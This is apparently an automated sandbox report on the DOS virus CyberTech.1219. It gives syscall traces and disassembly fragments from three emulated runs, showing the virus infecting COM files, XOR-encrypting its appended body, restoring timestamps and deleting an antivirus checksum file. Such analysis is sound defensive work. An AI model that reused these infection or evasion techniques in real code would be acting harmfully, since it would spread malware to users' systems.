Sample viewer

vx.netlux.org/Virus.DOS.CyberTech.1219

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:28:52.046951184Z 48 PC: 12a99 | Get DOS version
2018-12-17T22:28:52.048692135Z 42 PC: 12aa4 | Get date 0x12aa4: cmp cx, 0x7ca
0x12aa8: jae 0x12aad
0x12aaa: jmp 0x12b5a
0x12aad: mov ah, 0x1a
0x12aaf: mov dx, 0xfd00
0x12ab2: int 0x21
0x12ab4: mov ax, word ptr cs:[0x2c]
0x12ab8: mov ds, ax
0x12aba: mov si, 0
0x12abd: mov cx, 0x4000
0x12ac0: lodsb al, byte ptr [si]
0x12ac1: cmp al, 1
0x12ac3: je 0x12ac7
0x12ac5: loop 0x12ac0
0x12ac7: inc si
0x12ac8: push cs
0x12ac9: pop es
0x12aca: mov di, 0xfd80
0x12acd: mov cx, 0x80
0x12ad0: lodsb al, byte ptr [si]
2018-12-17T22:28:52.051255306Z 26 PC: 12ab4 | Set disk transfer address
2018-12-17T22:28:52.052938581Z 67 PC: 12b02 | Get or set file attributes
2018-12-17T22:28:52.067308294Z 67 PC: 12b0f | Get or set file attributes
2018-12-17T22:28:52.329398393Z 61 PC: 12b14 | Open file (Filename = 'A:\TEST.COM')
2018-12-17T22:28:52.336404911Z 87 PC: 12b1b | Get or set file date and time
2018-12-17T22:28:52.339261337Z 62 PC: 12b21 | Close file
2018-12-17T22:28:52.342074021Z 60 PC: 12b2a | Create or truncate file
2018-12-17T22:28:52.353841757Z 64 PC: 12b39 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:28:52.357384273Z 87 PC: 12b40 | Get or set file date and time
2018-12-17T22:28:52.359494956Z 62 PC: 12b44 | Close file
2018-12-17T22:28:52.366813246Z 67 PC: 12b4d | Get or set file attributes
2018-12-17T22:28:52.37699943Z 9 PC: 12b57 | Display string (Could not find end pointer)
2018-12-17T22:28:52.397351969Z 26 PC: 12d06 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5153,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:53:47.990829146Z 48 PC: 12a99 | Get DOS version
2018-12-25T11:53:47.993269123Z 42 PC: 12aa4 | Get date 0x12aa4: cmp cx, 0x7ca
0x12aa8: jae 0x12aad
0x12aaa: jmp 0x12b5a
0x12aad: mov ah, 0x1a
0x12aaf: mov dx, 0xfd00
0x12ab2: int 0x21
0x12ab4: mov ax, word ptr cs:[0x2c]
0x12ab8: mov ds, ax
0x12aba: mov si, 0
0x12abd: mov cx, 0x4000
0x12ac0: lodsb al, byte ptr [si]
0x12ac1: cmp al, 1
0x12ac3: je 0x12ac7
0x12ac5: loop 0x12ac0
0x12ac7: inc si
0x12ac8: push cs
0x12ac9: pop es
0x12aca: mov di, 0xfd80
0x12acd: mov cx, 0x80
0x12ad0: lodsb al, byte ptr [si]
2018-12-25T11:53:47.995950066Z 26 PC: 12b61 | Set disk transfer address
2018-12-25T11:53:47.997384644Z 78 PC: 12b6b | Find first file
2018-12-25T11:53:48.005221612Z 67 PC: 12b78 | Get or set file attributes
2018-12-25T11:53:48.010456049Z 67 PC: 12b80 | Get or set file attributes
2018-12-25T11:53:48.024205746Z 61 PC: 12b85 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:53:48.0370893Z 87 PC: 12b8b | Get or set file date and time
2018-12-25T11:53:48.038866324Z 63 PC: 12b98 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T11:53:48.045613189Z 66 PC: 12bbe | Move file pointer
2018-12-25T11:53:48.046840322Z 66 PC: 12c5d | Move file pointer
2018-12-25T11:53:48.048295826Z 63 PC: 12c67 | Read file or device (Read 52 bytes on handle 5)
2018-12-25T11:53:48.050853039Z 66 PC: 12bbe | Move file pointer (See above)
2018-12-25T11:53:48.052323946Z 44 PC: 12cb4 | Get time 0x12cb4: cmp dl, 0
0x12cb7: jne 0x12cc3
0x12cb9: mov ah, 9
0x12cbb: lea dx, word ptr [bp + 0x468]
0x12cbf: int 0x21
0x12cc1: jmp 0x12cb0
0x12cc3: mov byte ptr cs:[bp + 0x18], dl
0x12cc8: lea si, word ptr [bp + 4]
0x12ccc: mov di, 0xfb00
0x12ccf: mov cx, 0x18
0x12cd2: rep movsb byte ptr es:[di], byte ptr [si]
0x12cd4: lea si, word ptr [bp + 0x1c]
0x12cd8: mov cx, 0x4ab
0x12cdb: lodsb al, byte ptr [si]
0x12cdc: xor al, dl
0x12cde: stosb byte ptr es:[di], al
0x12cdf: loop 0x12cdb
0x12ce1: mov ah, 0x40
0x12ce3: mov dx, 0xfb00
0x12ce6: mov cx, 0x4c3
2018-12-25T11:53:48.055123245Z 64 PC: 12ceb | Write file or device (Write 1219 bytes on handle 5)
2018-12-25T11:53:48.064643367Z 66 PC: 12bbe | Move file pointer (See above)
2018-12-25T11:53:48.066444151Z 64 PC: 12cfc | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:53:48.074823024Z 87 PC: 12d2c | Get or set file date and time
2018-12-25T11:53:48.076488561Z 62 PC: 12d30 | Close file
2018-12-25T11:53:48.085015298Z 67 PC: 12d39 | Get or set file attributes
2018-12-25T11:53:48.090572989Z 65 PC: 12d41 | Delete file (Filename = 'chklist.cps')
2018-12-25T11:53:48.097681472Z 26 PC: 12d06 | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1995,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5153,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:53:48.156919026Z 48 PC: 12a99 | Get DOS version
2018-12-25T11:53:48.159360874Z 42 PC: 12aa4 | Get date 0x12aa4: cmp cx, 0x7ca
0x12aa8: jae 0x12aad
0x12aaa: jmp 0x12b5a
0x12aad: mov ah, 0x1a
0x12aaf: mov dx, 0xfd00
0x12ab2: int 0x21
0x12ab4: mov ax, word ptr cs:[0x2c]
0x12ab8: mov ds, ax
0x12aba: mov si, 0
0x12abd: mov cx, 0x4000
0x12ac0: lodsb al, byte ptr [si]
0x12ac1: cmp al, 1
0x12ac3: je 0x12ac7
0x12ac5: loop 0x12ac0
0x12ac7: inc si
0x12ac8: push cs
0x12ac9: pop es
0x12aca: mov di, 0xfd80
0x12acd: mov cx, 0x80
0x12ad0: lodsb al, byte ptr [si]
2018-12-25T11:53:48.161905876Z 26 PC: 12ab4 | Set disk transfer address
2018-12-25T11:53:48.163338926Z 67 PC: 12b02 | Get or set file attributes
2018-12-25T11:53:48.169798768Z 67 PC: 12b0f | Get or set file attributes
2018-12-25T11:53:48.188694153Z 61 PC: 12b14 | Open file (Filename = 'A:\TEST.COM')
2018-12-25T11:53:48.195836826Z 87 PC: 12b1b | Get or set file date and time
2018-12-25T11:53:48.197473813Z 62 PC: 12b21 | Close file
2018-12-25T11:53:48.199968688Z 60 PC: 12b2a | Create or truncate file
2018-12-25T11:53:48.21280376Z 64 PC: 12b39 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:53:48.215208871Z 87 PC: 12b40 | Get or set file date and time
2018-12-25T11:53:48.217184852Z 62 PC: 12b44 | Close file
2018-12-25T11:53:48.222626628Z 67 PC: 12b4d | Get or set file attributes
2018-12-25T11:53:48.229534858Z 9 PC: 12b57 | Display string (Could not find end pointer)
2018-12-25T11:53:48.24173664Z 26 PC: 12d06 | Set disk transfer address